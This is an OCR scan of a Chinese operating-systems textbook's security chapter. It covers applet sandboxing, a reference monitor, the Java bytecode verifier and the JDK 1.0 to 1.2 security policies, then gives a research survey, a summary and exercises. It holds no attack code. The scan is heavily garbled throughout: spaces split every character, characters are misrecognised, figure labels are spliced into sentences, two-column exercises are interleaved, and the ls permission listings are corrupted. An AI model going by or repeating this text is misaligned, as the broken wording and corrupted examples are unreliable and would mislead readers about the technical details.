计算 ， 该 地 址 被 存 和 一 寄存 器 ， 然 后 间接 跳 转 。 例 如 ， 通 过 JMP (R1) 跳 转 到 寄存 器 1 里 存放 的 地 址 。 
这 种 指令 的 有 效 性 必须 在 运行 时 检查 。 检 查 时 ， 系 统 直接 在 间接 跳 转 之 前 插入 代码 ， 以 便 测试 目标 地 址 。 
这 样 测试 的 一 个 例子 如 图 9-38b 所 示 。 请 记 住 ， 所 有 的 有 效 地 址 都 有 同样 的 高 k 位 地 址 ， 所 以 该 地 址 前 组 
被 存放 在 临时 寄存 器 里 ， 如 说 S2。 这 样 的 寄存 器 不 能 被 Applet 自 身 使 用 ， 因 为 Applet 有 可 能 要 求 重 写 寄 
存 器 以 避免 受 该 寄存 器 限制 。 

有 关 代码 是 按 如 下 工作 的 : 首先 把 被 检查 的 目标 地 址 复制 到 临时 寄存 器 S1 中 。 然 后 该 寄存 器 向 右 
移 位 正好 将 S1 中 的 地 址 前 缀 隔离 出 来 。 第 二 步 将 隔离 出 的 前 级 同 原先 装 入 S2 寄 存 器 里 的 正确 前 绥 进行 
比较 。 如 果 不 匹 配 就 激活 陷入 程序 杀 死 进 程 。 这 段 代码 序 列 需 要 四 条 指令 和 两 个 临时 寄存 器 。 

对 运行 中 的 二 进 制 程序 打 补 丁 需要 一 些 工作 ， 但 却 是 可 行 的 。 如 果 Applet 是 以 源 代码 形式 出 现 ， 工 
作 就 容易 得 多 。 随 后 在 本 地 的 编译 器 对 Applet 进 行 编译 ， 自 动 查看 静态 地 址 并 插入 代码 来 校 验 运行 中 的 
动态 地 址 。 同 样 也 需要 一 些 运行 时 间 的 开销 以 便 进行 动态 校 输 。Wahbe 等 人 (1993) 估计 这 方面 的 时 间 
大 约 占 4%， 这 一 般 是 可 接受 的 。 

另 一 个 要 解决 的 问题 是 当 Applet 试 图 进行 系统 调用 时 会 发 生 什 么 ?解决 方法 是 很 直接 的 。 系 统 调用 的 
指令 被 一 个 叫 作 基准 监视 器 的 特殊 模块 所 替代 ， 这 一 模块 采用 了 与 动态 地 址 校 验 相同 的 检查 方式 (或 者 ， 
如 果 有 源 代码 ， 可 以 链接 一 个 调用 基准 监视 器 的 库 文件 ， 而 不 是 执行 系统 调用 )。 在 这 两 个 方法 中 ， 基 准 
监视 器 检查 每 一 个 调用 企图 ， 并 决定 该 调用 是 否 可 以 安全 执行 。 如 果 认为 该 调用 是 可 接受 的 ， 如 在 指定 的 
暂 存 目 录 中 写 临 时 文件 ， 这 种 调用 就 可 以 执行 。 如 果 调 用 被 认为 是 危险 的 或 者 基准 监视 器 无 法 判断 ， 
Applet 就 被 终止 。 若 基准 监视 器 可 以 判断 是 哪 一 个 Applet 执 行 的 调用 ， 内 存 里 的 一 个 基准 监视 器 就 能 处 理 
所 有 这 样 Applet 的 请 求 。 基 准 监视 器 通常 从 配置 文件 中 获知 是 否 允 许 执行 。 

2. RR 

第 二 种 运行 不 安全 Applet 的 方法 是 解释 运行 并 阻止 它们 获得 对 硬件 的 控制 。Web 浏 览 器 使 用 的 就 是 


检查 系统 的 Mov R1, S1 

访问 监视 器 SHR #24, S1 
CMP S1, S2 
TRAPNE 
JMP (R1) 
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这 种 方法 。 网 页 上 的 Applet 通 常 是 用 Java 写 的 ，Java 可 以 是 一 种 普通 的 编程 语言 ， 也 可 以 是 高 级 脚本 语 
言 ， 如 安全 TCL 语 言 或 Javascript。Java Applet 首 先 被 编 虚拟 地 址 空间 
译 成 一 种 叫 作 JVM (Java 虚拟 机 ，Java Virtual Machine) QOxFFFFFFFF 
的 面向 栈 的 机 器 语言 。 正 是 这 些 JVM Applet 被 放 在 网 页 
上 ， 当 它们 被 下 载 时 就 插入 到 浏览 器 内 置 的 JVM 解 释 器 
中 ， 如 图 9-39 所 示 。 

使 用 解释 运行 的 代码 比 编译 运行 的 代码 好 处 在 于 ， 
每 一 条 指令 在 执行 前 都 由 解释 器 进行 检查 。 这 就 给 了 解 om 
释 器 识别 校 验 地 址 是 否 有 效 的 机 会 。 另 外 ， 系 统 调用 也 
可 以 被 捕捉 并 解释 。 这 些 调用 的 处 理 方式 与 安全 策略 有 Web 浏 览 器 
关 。 例 如 ， 如 果 Applet 是 可 信任 的 (如 来 自 本 地 磁盘 的 
Applet) ， 它 的 系统 调用 就 可 以 毫 无 疑问 会 被 执行 。 但 是 ”图 9-39 Applet 可 以 被 Web 浏 览 器 以 解释 方式 
如 果 Applet 不 受信 任 (如 来 自 Internet 的 Applet)， 它 就 会 执行 
被 放 入 沙 盒 来 限制 自身 的 行为 。 

高 级 脚本 语言 也 能 够 被 解释 执行 。 这 里 ， 解 释 执行 不 需要 机 器 地 址 ， 所 以 也 就 不 存在 脚本 以 不 允许 
的 方式 访问 内 存 所 带 来 的 危险 。 解 释 运行 的 缺点 是 : 它 与 编译 运行 的 代码 相 比 十 分 缓慢 。 


9.10.7 _ Java 安全 性 

人 们 设计 了 Java 编 程 语言 和 相关 的 运行 时 系统 ， 是 为 了 一 次 编写 并 编译 后 就 能 够 在 Interent 上 以 二 进 
制 代 码 的 形式 运行 在 所 有 支持 Java 的 机 器 上 。 从 一 开始 设计 Java 语 言 开始 ， 安 全 性 就 成 为 其 重要 的 一 部 
分 。 在 这 一 小 节 ， 我 们 来 看 看 它 的 工作 原理 。 

Java 是 一 种 类 型 安全 的 编程 语言 ， 即 编译 器 拒绝 任何 值 与 类 型 不 符 的 变量 的 使 用 。 而 C 语 言 正好 相 
反 ， 请 看 下 面 的 代码 ; 

naughty_func() 





不 可 信 
Applet 


可 信 
Applet 


代码 把 产生 的 随机 数 放 在 指针 p 中 。 然 后 把 0 字 节 存储 在 p 所 包含 的 地 址 中 ， 覆 盖 了 地 址 里 原先 的 任 
何 代 码 和 数据 。 而 在 Java 中 ， 混 合 使 用 类 型 的 语句 是 被 语法 所 禁止 的 。 而 且 ，Java 没 有 指针 变量 、 类 型 
转换 、 用 户 控制 的 存储 单元 分 配 (如 malloc 和 free)， 并 且 所 有 的 数组 引用 都 要 在 运行 时 进行 校 验 。 

Java 程 序 被 编译 成 一 种 叫 作 JVM (Java Virtual Machine) 字 节 码 的 中 间 形 态 二 进 制 代码 。JVM 有 大 
约 100 个 指令 ， 大 多 数 指令 是 把 不 同类 型 的 对 象 压 入 栈 、 弹 出 栈 或 是 用 算术 合并 栈 里 的 对 象 。 这 些 JVM 
程序 通常 是 解释 执行 程序 ， 虽 然 在 某 些 情况 下 它们 可 以 被 编译 成 机 器 语言 以 便 执行 得 更 快 。 在 Java 模 式 
中 ， 通 过 Internet 发 送 到 远程 计算 机 上 运行 的 Applet 是 JVM 程 序 。 

当 Applet 到 达 远 程 计 算 机 时 ， 首 先 由 JVM 字 节 码 校 验 器 查看 Applet 是 否 符合 规则 。 正 确 编译 的 
Applet 会 自动 符合 规则 ， 但 无 法 阻止 一 个 恶意 的 用 户 用 汇编 语言 写 JVM 格 式 的 Applet。 校 验 的 规则 包括 : 

1) Applet 是 否 伪 造 了 指针 ? 

2) 是 否 违背 了 私有 类 成 员 的 访问 限制 ? 

3) 是 否 试图 把 某 种 类 型 的 变量 用 作 其 他 类 型 ? 

4) 是 否 产生 栈 上 溢 或 下 溢 ? 

5) 是 否 非法 地 将 变量 从 一 种 类 型 转换 为 另 一 种 类 型 ? 

如 果 Applet 通 过 了 所 有 的 测试 ， 它 就 能 被 安全 地 执行 并 且 不 用 担心 它 会 访问 非 自己 所 有 内 存 空 间 。 

但 是 Applet 也 可 以 通过 调用 Java 方 法 (过程 ) 来 执行 系统 调用 。Java 处 理 这 种 调用 的 方法 也 在 不 断 
在 进步 。 在 最 初 的 Java 版 本 JDK (Java Development Kit) 1.0 里 ，Applet 被 分 为 两 类 : 可 信和 的 与 不 可 信和 的。 
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从 本 地 磁盘 取出 的 Applet 是 可 信和 的 并 被 允许 执行 任何 所 需要 的 系统 调用 。 相 反 ， 从 Internet 获 取 的 Applet 
是 不 可 信 的 。 它 们 被 限制 在 沙 盒 里 运行 ， 如 图 9-39 所 示 ， 实 际 上 并 不 能 做 什么 事 。 

在 从 这 一 模式 中 取得 了 些 经 验 后 ，Sun 公 司 认为 对 Applet 的 限制 太 大 了 。 在 JbK 1.1 版 本 里 ， 引 入 了 
版 本 标注 。 当 Applet 从 Internet 传 递 过 来 后 ， 系 统 首先 查看 Applet 是 否 有 用 户 信任 的 个 人 或 组 织 标注 ( 通 
过 用 户 所 信任 的 标注 者 列表 来 定义 ) 。 如 果 是 ，Applet 就 被 允许 做 任何 操作 ， 否 则 就 必须 在 沙 盒 里 运行 
并 且 受 到 很 强 的 限制 。 

在 获取 了 一 些 经 验 后 ， 代 码 标注 也 不 那么 令 人 满意 了 ， 所 以 安全 模式 又 有 了 变化 。JDK 1.2 版 本 提 
供 了 一 套 可 配置 的 严密 的 安全 策略 ， 针 对 包含 本 地 和 异地 所 有 的 Applet。 安 全 模式 非常 复杂 导致 需要 整 
整 一 本 书 来 描述 (Gong, 1999) ， 我 们 仅仅 归纳 出 一 些 精 华 的 部 分 。 

每 一 个 Applet 具 有 两 个 特性 : 来 源 于 何 处 以 及 谁 签署 了 它 。 来 源 于 何 处 是 指 URL， 谁 签署 了 它 是 指 
签名 所 用 的 私 钥 。 每 个 用 户 都 能 创建 包含 规则 列表 的 安全 策略 。 规 则 列 出 了 URL、 签 署 者 、 对 象 以 及 如 
果 Applet 的 URL 和 签署 者 匹配 规则 时 可 在 对 象 上 执行 的 动作 。 从 概念 上 来 说 ， 上 述 信息 如 图 9-40 所 示 ， 
虽然 真正 的 格式 有 所 不 同 并 且 与 Java 的 类 等 级 有 关 。 


URL 对 象 动作 
/usr/susan/1040.xls | Read 
* 


www.taxprep.com 
/usr/tmp/* Read, Write 
www.microsoft.com | Microsoft | /ust/susan/Office/— | Read, Write, Delete 
































图 9-40 JDK 1.2 所 指定 的 某 些 保护 规则 的 实例 


其 中 的 一 种 允许 的 动作 是 访问 文件 。 该 动作 可 以 指定 某 一 特定 的 文件 或 目录 ， 给 定 目录 下 的 所 有 文 
件 ， 或 给 定 目录 下 所 有 的 文件 和 子 目 录 的 递归 集合 。 图 9-21 的 三 行 包含 了 3 种 情况 。 在 第 一 行 里 ， 用 户 
Susan 建 立 了 她 的 许可 文件 ， 这 样 来 自 她 的 税务 预备 用 计算 机 ，www.taxprep.com， 并 由 该 公司 签名 的 
Applet 可 以 访问 位 于 1040.xls 文 件 里 的 她 的 税务 数据 。 这 是 唯一 可 读 的 文件 ， 并 且 任 何其 他 的 Applet 都 不 
能 读 。 而 且 ， 来 自 于 所 有 资源 的 所 有 Applet， 无 论 是 否 签名 ， 都 可 以 读 写 /usr/tmp 中 的 文件 。 

而 且 ，Susan 也 信任 Microsoft， 让 来 自 于 该 公司 站 点 并 签名 过 的 Applet 读 、 写 或 删除 Office 目 录 下 的 
所 有 文件 。 例 如 ， 修 复 bug 并 安装 新 的 软件 版 本 。 为 了 校 验 签名 ，Susan 要 么 在 她 的 磁盘 里 存放 公 钥 ， 要 
么 动态 地 获取 公 钥 ， 例 如 ， 在 持 有 她 所 信任 的 公司 的 公 钥 以 后 ， 使 用 该 公司 的 签名 证 书 格式 。 

文件 不 是 仅仅 要 保护 的 资源 。 网 络 访问 也 可 以 被 保护 。 被 保护 的 对 象 是 特定 计算 机 的 特定 端口 。 每 
一 台 计 算 机 由 一 个 耳 地址 或 DNS 名 确定 ， 计 算 机 上 的 端口 由 一 排 数字 确定 。 可 能 的 动作 包括 要 求 连接 远 
程 计 算 机 以 及 接受 来 自 远程 计算 机 的 连接 。 通 过 这 种 方法 ，Applet 可 以 获得 访问 网 络 的 权限 ， 但 仅 局 限 
于 与 许可 列表 中 明示 的 计算 机 进行 交谈 。Applet 可 以 动态 地 装 入 所 需 的 附加 代码 (类 ) ， 但 用 户 提供 的 
类 装载 器 可 以 精确 地 控制 由 哪 台 计算 机 产生 这 样 的 类 。 当 然 还 有 其 他 大 量 的 安全 特性 。 


9.11 有 关 安 全 的 研究 


计算 机 安全 是 一 个 非常 热门 的 研究 课题 。 相 关 工 作 涉及 密码 学 、 恶 意 软件 、 攻 击 与 防御 、 编 译 器 等 
领域 。 一 系列 引 人 注 意 的 安全 事故 使 得 学 术 界 与 工业 界 的 研究 热点 在 短 时 间 内 不 会 出 现 较 大 的 变化 。 

安全 研究 的 一 个 重要 方向 是 二 进 制 程序 的 保护 。 控 制 流 完整 性 (CFI) 是 一 种 相对 传统 的 技术 ， 可 
用 来 阻止 所 有 的 控制 流 自 改 ， 即 防御 所 有 基于 返回 导向 编程 技术 (ROP) 的 攻击 。 不 幸 的 是 ， 这 种 做 法 
的 代价 十 分 高 昂 。 但 由 于 针对 缓冲 区 溢出 攻击 的 防御 手段 (如 地 址 空间 布局 随机 化 (ASLR) 和 数据 执 
行 保护 (DEP) ) 等 并 未 舍弃 对 控制 流 完整 性 的 检测 ， 因 此 近来 的 研究 工作 致力 于 控制 流 完整 性 技术 的 
实用 化 。 例 如 ， 纽 约 州立 大 学 石 溪 分 校 的 Zhang 和 Sekar 于 2013 年 开发 了 一 种 针对 Linux 二 进 制程 序 的 高 
效 控制 流 完整 性 检测 技术 (Zhang，2013)。 同 年 ， 石 溪 分 校 的 另 一 个 研究 小 组 开发 了 另 一 种 针对 
Windows 二 进 制程 序 的 更 为 高 效 的 控制 流 完整 性 检测 技术 (Zhang，2013b)。 其 他 研究 尝试 更 早 地 检测 
到 缓冲 区 溢出 攻击 ， 和 争取 在 缓冲 区 溢出 时 即刻 发 出 警报 而 不 必 延 时 到 控制 流 遭 遇 算 改 后 才能 报警 
(Slowinska 等 人 ，2012)。 相 对 于 控制 流 完整 性 检测 ， 缓 冲 区 洲 出 检测 的 优势 在 于 系统 还 可 以 对 其 他 非 
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控制 流 的 数据 进行 监控 。 此 外 ， 还 有 其 他 的 工具 可 在 编译 阶段 提供 类 似 的 防护 手段 ， 如 Google 的 
AddressSanitizer (Serebryany，2013) 。 如 果 上 述 技术 能 够 得 到 广泛 应 用 ， 那 么 我 们 将 另 起 一 段 来 介绍 
缓冲 区 溢出 的 防御 技术 及 它们 之 间 的 优 劣 。 

近期 密码 学 研究 的 热点 方向 是 同 态 加 密 (homomorphic encryption)。 根 据 laymen 的 描述 ， 同 态 加 密 
允许 数据 在 加 密 的 状态 下 进行 运算 ， 如 相 加 、 相 减 等 ， 意 即 加 密 数据 无 须 解 码 为 明文 便 可 参与 运算 。 
Bogdanov 和 Lee 在 他 们 的 工作 中 研究 了 同 态 加 密 在 安全 方面 的 局 限 性 (Bogdanov 等 人 ，2013 ) 。 

权限 与 访问 控制 也 是 非常 活跃 的 研究 方向 。 例 如 ，seL4 就 是 一 个 支持 权限 控制 的 微 内 核 操 作 系 统 
(Klein 等 人 ，2009) ， 同 时 它 还 是 一 个 完整 的 可 验证 内 核 ， 提 供 了 额外 的 安全 保证 。 权 限 控制 在 Unix 系 


” 统 中 也 得 到 了 关注 。Robert Watson 等 人 开发 了 基于 FreeBSD 的 轻 量 级 权限 控制 (Robert, 2013), 


最 后 ， 我 们 简要 地 介绍 攻击 技术 与 恶意 软件 的 相关 工作 。 此 类 研究 数量 繁多 。 例 如 ，Hund 等 人 发 
现 了 一 种 可 以 绕 过 Windows 内 核 中 地 址 空间 随机 化 的 定时 信道 攻击 手段 (Hund A, 2013). 。 类 似 地 ， 
Snow 等 人 也 发 现 ， 浏 览 器 中 的 Javascript 地 址 空间 随机 化 在 攻击 者 探测 到 内 存 泄漏 的 情况 下 (即使 是 很 
小 的 一 部 分 内 存 ) 将 会 无 效 化 (Snow 等 人 ，2013)。 关 于 恶意 软件 ，Rossow 等 人 的 工作 分 析 了 
(Rossow 等 人 ，2013) 僵尸 网 络 (Botnet) 的 适应 性 ， 特 别 是 基于 P2P 通 信 的 僵尸 网 络 在 未 来 几 年 中 将 难 
以 解除 。 有 一 些 僵尸 网 络 甚至 已 经 持续 运行 了 5 年 之 久 。 


9.12 小结 


计算 机 中 经 常会 包含 有 价值 的 机 密 数据 ， 包 括 纳税 申请 单 、 信 用 卡 账号 、 商 业 计划 、 交 易 秘密 等 。 
这 些 计算 机 的 主人 通常 非常 渴望 保证 这 些 数据 是 私人 所 有 ， 不 会 被 窜改 ， 这 就 迅速 地 导致 了 我 们 要 求 操 
作 系 统一 定 要 有 好 的 安全 性 。 一 种 保证 信息 机 密 的 方法 是 把 它 加 密 并 妥善 地 保管 密 钥 。 有 时 候 提 供 数字 
信息 的 验证 是 很 重要 的 ， 在 这 种 情况 下 ， 可 以 使 用 加 密 散 列表 、 数 字 签名 以 及 被 一 个 可 信和 的 证 书 验证 机 
构 所 签名 的 证 书 。 

操作 系统 安全 的 基础 构件 是 对 系统 资源 的 访问 控制 。 访 问 权限 可 以 被 看 作 一 个 大 型 矩阵 ， 其 中 行 代 
表 主 体 ， 列 代表 客体 。 每 一 个 单元 格 描述 了 主体 对 客体 的 访问 权限 。 由 于 和 矩阵 非常 稀 玻 ， 因 此 可 以 按 行 
存储 ， 形 成 权限 列表 来 描述 某 一 主体 能 够 对 哪些 客体 进行 何 种 操作 ， 也 可 以 按 列 存储 ， 形 成 访问 控制 列 
表 来 描述 某 一 客体 能 够 被 哪些 主体 所 操作 。 利 用 形式 化 建 模 技 术 ， 系 统 内 的 信息 流 可 以 被 建 模 并 限制 。 
但 是 ， 在 某 些 情 况 下 ， 信 息 仍然 可 能 通过 隐蔽 信道 外 泄 ， 例 如 调节 CPU 的 使 用 率 等 。 

一 种 保持 信息 私密 性 的 手段 是 对 信息 进行 加 密 并 小 心 管理 密 钥 。 加 密 机 制 可 以 分 为 私 钥 加 密 和 公 铀 
加 密 。 私 钥 加 密 方法 要 求 通信 参与 者 利用 带 外 机 制 提 前 交换 私 钥 。 公 钥 加 密 则 无 须 如 此 ， 但 是 在 实际 的 
使 用 中 效率 较 低 。 某 些 情 况 下 需要 对 数字 信息 的 真实 性 进行 验证 ， 由 于 加 密 机 制 会 使 得 验证 过 程 繁琐 复 
杂 ， 因 此 可 以 使 用 可 信和 的 第 三 方 所 提供 的 数字 签名 和 许可 证 明 。 

在 任何 一 个 安全 的 系统 一 定 要 认证 用 户 。 这 可 以 通过 用 户 知道 的 、 用 户 拥 有 的 ， 或 者 用 户 的 身份 
(生物 测定 ) 来 完成 。 使 用 双 因 素 的 身份 认证 ， 比 如 虹膜 扫描 和 密码 ， 可 以 加 强 安全 性 。 

代码 中 有 很 多 bug 可 以 被 利用 来 控制 程序 和 系统 。 这 些 包括 缓冲 区 溢出 、 格 式 串 攻击 、 返 回 libc 攻 击 、 
整数 溢出 攻击 、 代 码 注入 攻击 和 特权 扩大 攻击 。 

Internet 上 遍布 恶意 软件 ， 有 特洛伊 木马 、 病 毒 、 蠕 虫 、 间 谍 软 件 和 rookit。 每 一 个 都 对 数据 机 密 性 
和 一 致 性 产生 着 威胁 。 更 糟糕 的 是 ， 恶 意 软件 攻击 可 能 会 控制 一 台 机 器 ， 并 把 这 台 机 器 变 成 一 台 僵 尸 机 
器 用 来 发 送 垃圾 邮件 或 者 发 起 其 他 的 攻击 。 许 多 互联 网 上 的 攻击 都 是 通过 一 台 僵 尸 主 控 机 控制 一 个 僵尸 
军队 来 完成 的 。 

幸运 的 是 ， 系 统 有 很 多 种 方法 来 保护 自己 。 最 好 的 策略 就 是 全 面 防 御 ， 使 用 多 种 技术 一 起 防御 。 这 
些 技术 有 防火 墙 、 病 毒 扫描 、 代 码 签名 、 囚 禁 、 入 侵 检 测 ， 以 及 封装 移动 代码 。 


习题 
1. 机 密 性 、 完 整 性 和 可 用 性 是 安全 的 三 个 组 成 部 完整 性 ， 但 对 可 用 性 无 要 求 的 应 用 ， 以 及 一 款 


分 。 描 述 一 款 需要 确保 完整 性 和 可 用 性 ， 但 对 需要 确保 机 密 性 、 完 整 性 和 可 用 性 的 应 用 。 
机 密 性 无 要 求 的 应 用 ， 一 款 需 要 确保 机 密 性 和  € 2. 构建 安全 操作 系统 的 一 项 技术 是 尽 可 能 地 最 小 
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化 可 信 计 算 基 (TCB)。 以 下 功能 哪些 需要 在 
TCB 之 内 实现 ， 哪 些 可 以 在 TCB 之 外 实现 ? 

(a) 进程 上 下 文 切换 

(b) 从 磁盘 读 取 文件 

(c) 扩容 交换 区 

(d) WF EER 

(€) 获取 智能 手机 的 GPS 坐标 


.什么 是 隐蔽 信道 ?隐蔽 信道 存在 的 基本 要 求 是 


什么 ? 


.在 完整 的 访问 控制 矩阵 中 ， 行 代表 主体 ， 列 代 


表 客 体 。 当 某 些 客体 被 两 个 主体 所 需要 时 ， 情 
况 如 何 ? 


.假设 一 个 系统 在 某 时 有 5000 个 对 象 和 100 个 域 。 


在 所 有 域 中 1% 的 对 象 是 可 访问 的 (r、w 和 x 的 
某 种 组 合 ), 两 个 域 中 有 10% 的 对 象 是 可 访问 的 ， 
剩 下 89% 的 对 象 只 在 唯一 一 个 域 中 才 可 访问 。 
假设 需要 一 个 单位 的 空间 存储 访问 权 (r、w 和 x 
的 某 种 组 合 ) 、 对 象 ID 或 一 个 域 ID 。 分 别 需 要 多 
少 空间 存储 全 部 的 保护 矩阵 、 作 为 访问 控制 表 
的 保护 和 矩阵 和 作为 能 力 表 的 保护 矩阵 ? 


. 解释 在 下 列 操作 过 程 中 ， 哪 种 安全 防护 矩阵 的 


实现 更 为 合适 ? 
(a) 赋予 所 有 用 户 针对 某 一 文件 的 读 权限 。 
(b) 撤销 所 有 用 户 针 对 某 一 文件 的 写 权 限 。 
(c) 赋予 用 户 John、Lisa、Christie 和 Jeff 针 对 某 
一 文件 的 写 权 限 。 
(d) 撤销 用 户 Jana、Mike、Molly 和 Shane 针 对 
某 一 文件 的 执行 权限 。 


.我 们 讨论 过 的 两 种 保护 机 制 是 权限 表 和 访问 控 


制 表 。 对 于 下 列 每 一 个 关于 保护 的 问题 ， 请 问 

应 该 使 用 哪 一 种 机 制 。 

(a) Ken 希 望 除了 他 的 某 位 办 公 室 的 同事 之 外 ， 
其 他 所 有 人 都 可 以 读 到 他 的 文件 。 

(b) Mitch 和 Steve 想 要 共享 一 些 秘密 文件 。 

(c) Linda 希 望 她 的 部 分 文件 是 公开 的 。 


. 请 给 出 在 以 下 UNIX 目 录 里 所 列 保护 矩阵 的 所 有 


者 和 操作 权限 。 请 注意 ，asw 属 于 两 个 组 : 
users 和 devel; gmw 仅 仅 是 users 组 的 成 员 。 把 两 
个 成 员 和 两 个 组 当 作 域 ， 和 矩阵 就 有 四 行 (每 个 


域 一 行 ) 和 四 列 (每 个 文件 一 列 )。 

-MW-f--[-- 2 gmw users 908 May2616:45 PPP-Notes 
—IWxr-Xrx 1 asw devel 42 May1312:35 progi 
-W-m---- 1 asw users 50094 May3017:51 projectt 
-IW-F---- 1 asw devel 13124 May3114:30 splash.gif 
针对 上 一 题 中 的 访问 列表 ， 给 出 每 个 所 列 目录 


的 操作 权限 。 
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修改 上 例 中 的 访问 控制 列表 ， 以 表述 基于 Unix 


:的 rwx 系 统 无 法 描述 的 文件 权限 ， 并 给 出 解释 。 


1 


_ 


.假设 系统 内 存在 三 个 安全 级 别 ， 分 别 是 级 别 1、 


级 别 2 和 级 别 3。 客 体 A 和 B 属 于 级 别 1，C 和 D 
属于 级 别 2，E 和 F 属 于 级 别 3， 进 程 1 和 2 属于 
级 别 1，3 和 4 属于 级 别 2，5 和 6 属于 级 别 3。 那 
么 在 Bell-LaPadula 模 型 、Biba 模 型 及 二 者 结合 
的 模型 中 ， 下 述 操作 能 否 被 允许 ? 

(a) 进程 1 对 客体 D 进 行 写 操作 

(b) 进程 4 对 客体 A 进行 读 操 作 

(c) 进程 3 对 客体 C 进 行 读 操 作 

(d) 进程 3 对 客体 C 进 行 写 操作 

(e) 进程 2 对 客体 D 进 行 读 操作 

O 进程 5 对 客体 F 进 行 写 操作 

(g) 进程 6 对 客体 E 进 行 读 操作 

(h) 进程 4 对 客体 E 进 行 写 操作 

(i) 进程 3 对 客体 F 进 行 读 操作 


.在 保护 权限 的 Amoeba 架 构 里 ， 用 户 可 要 求 服 ， 


务 器 产生 一 个 享有 部 分 权限 的 新 权限 ， 并 可 转 
移 给 用 户 的 朋友 。 如 果 该 朋友 要 求 服务 器 移 去 
更 多 的 权限 以 便 转移 给 其 他 人 的 话 ， 会 发 生 什 
么 情况 呢 ? 


.在 图 9-11 里 ， 从 进程 B 到 对 象 1 没有 箭头 。 可 以 


允许 存在 这 类 箭头 吗 ? 如 果 存 在 ， 它 破坏 了 什 
么 原则 ? 


.如 果 在 图 9-11 里 允许 消息 从 进程 传递 到 进程 ， 


这 样 符合 的 是 什么 原则 ? 特别 对 进程 B 来 说 ， 
它 可 以 对 哪些 进程 发 送 消息 ， 哪 些 不 可 以 ? 


.思考 图 9-14 中 的 隐 写 术 系 统 ， 每 一 个 像素 都 可 


以 被 使 用 颜色 空间 的 RGB 三 个 值 来 加 以 表达 。 
当 在 图 中 使 用 隐 写 术 写 入 信息 时 ， 解 释 颜色 分 
辨 率 发 生 了 哪些 变化 。 


.请 破解 本 题 中 使 用 字母 替换 法 加 密 的 密 文 ， 明 


文 是 英国 诗人 Lewis Carroll 的 一 首 脸 狂人 口 的 
佳作 。 
kfd ktbd fzm eubd kfd pzyiom mztx ku kzyg 
ur bzha kfthcm 
ur mfudm zhx mftnm zhx mdzythe pzq ur 
ezsszcdm zhx gthcm 
zhx pfa kfd mdz tm sutythe fuk zhx pfdkfdi 
ntem fzld pthem 
sok pztk z stk kfd uamkdim eitdx sdruid pd 
fzld uoi efzk 
rui mubd ur om zid uok ur sidzkf zhx zyy ur 
om zid rzk 
hu foiia mztx kfd ezindhkdi kfda kfzhgdx ftb 
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boef rui kfzk 

考虑 一 个 密 钥 ， 它 是 一 个 26 x 26 的 矩阵 , 7S 
列 皆 使 用 ABC…Z 来 标明 ， 明 文 是 同时 加 密 的 
两 个 字母 , 第 一 个 字母 是 列 , 第 二 个 字母 是 行 ， 
每 一 对 行列 标记 所 对 应 的 元 素 便 是 明文 ， 请 问 
这 个 数组 有 什么 约束 条 件 ? 整个 数组 中 有 多 少 
元 素 ? 


.考虑 下 述 加 密 文件 的 方式 。 加 密 算法 使 用 两 个 


n 字 节 的 数组 A 和 B。 首 先 ， 读 取 文 件 中 的 前 
个 字 节 到 数组 4， 随 后， 复制 A[0] 到 B[i] AN] 
到 B[ 站 ，A[2] 到 B[k]， 以 此 类 推 , 复制 结束 后 ， 
将 数据 8 中 的 n 个 字 节 写 入 输出 文件 ， 并 读 取 文 
件 中 的 后 续 n 个 字 节 到 数组 4。 此 过 程 不 断 进行 
直到 整个 文件 加 密 完 成 。 注 意 ， 此 算法 并 未 使 
用 字符 替换 , 而 仅仅 打 乱 了 原文 件 的 字符 顺序 。 
对 密 钥 空间 进行 全 面 搜索 需要 尝试 多 少 次 ?对 
比 单字 母 表 字符 替换 加 密 算法 ， 谈 谈 此 加 密 算 
法 的 优势 。 


. 私 钥 加 密 比 公 钥 加 密 更 加 高 效 ， 但 是 需要 数据 


发 送 方 和 接收 方针 对 所 用 密 钥 提前 达成 共识 。 
假设 数据 发 送 方 和 接收 方 从 未 见面 ， 但 是 存在 
一 个 可 信和 的 第 三 方 ， 它 与 数据 发 送 方 共享 一 个 
私 钥 ， 与 数据 接收 方 共享 另 一 个 私 钥 。 在 此 情 
景 下 ， 数 据 的 发 送 方 和 接收 方 如 何 建立 一 个 新 
的 私 钥 ? 

给 出 一 个 数学 函数 的 实例 ， 满 足 一 级 近似 为 单 
向 函数 。 


.假设 彼此 陌生 的 A 和 B 二 人 试图 通过 私 钥 建立 


通信 ， 但 是 他 们 并 未 共享 密 钥 。 设 若 二 人 均 信 
任 某 一 可 信 的 第 三 方 C， 而 C 的 公 钥 广 为 人 知 。 
那么 在 此 情况 下 ，A 与 B 应 当 如 何 就 新 的 私 钥 
达成 一 致 以 建立 通信 ? 

入 网 的 咖啡 厅 越 来 越 多 ， 人 们 也 越 来 越 愿意 坐 
在 咖啡 厅 里 处 理 商业 事务 。 描 述 一 种 通过 智能 
卡 进 行文 件 签名 的 方法 (假设 所 有 的 电脑 都 装 
有 读 卡 器 )， 并 回答 你 的 方法 是 否 安全 。 


.采用 各 种 压缩 算法 ASCII 文 件 里 的 自然 语言 可 


被 压缩 至 少 50%。 如 果 采 用 在 1600 x 1200 图 片 
中 每 个 像素 低位 插入 ASCII 文 本 的 方法 ， 隐 写 
术 可 写 人 的 容量 大 小 为 多 少 个 字 节 ? 图 片 尺寸 
将 增加 到 多 少 (假设 没有 加 密 数 据 也 没有 由 加 
密 带 来 的 扩展 ) ? 这 种 方法 的 效率 即 负载 / 
(所 传送 的 字 节 ) 多 大 ? 

假设 一 组 紧密 联系 的 持 不 同 政见 者 在 被 压制 的 
国家 使 用 隐 和 写 术 发 送 有 关 该 国 的 状况 消息 到 国 
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外 ,政府 意识 到 这 一 点 并 发 送 含 有 虚假 信息 的 
伪造 图 片 。 这 些 持 不 同 政 见 者 如 何 告诉 人 们 来 
区 分 真实 的 消息 和 错误 的 消息 ? 

去 www.cs.vu.nl/ast 网 站 点 击 covered writing 链 
接 。 按 照 指令 抽取 剧本 。 回 答 下 面 的 问题 : 
(a) 原始 的 斑马 纹 和 斑马 纹 文件 的 大 小 是 多 少 ? 
(b) 斑马 纹 文件 中 秘密 地 存储 了 什么 剧本 ? 
(c) 斑马 纹 文件 中 秘密 地 存储 了 多 少 字 节 ? 


:让 计算 机 不 回 显 密 码 比 回 显 星 号 安全 些 。 因 为 


回 显 出 星 号 会 让 屏幕 周围 的 人 知道 密码 的 长 
度 。 假 设 密码 仅 包括 大 小 写字 母 和 数字 ， 密 码 
长 度 必 须 大 于 5 个 字符 小 于 8 个 字符 ， 那 么 在 不 
出 现 回 显 时 有 多 安全 ? 


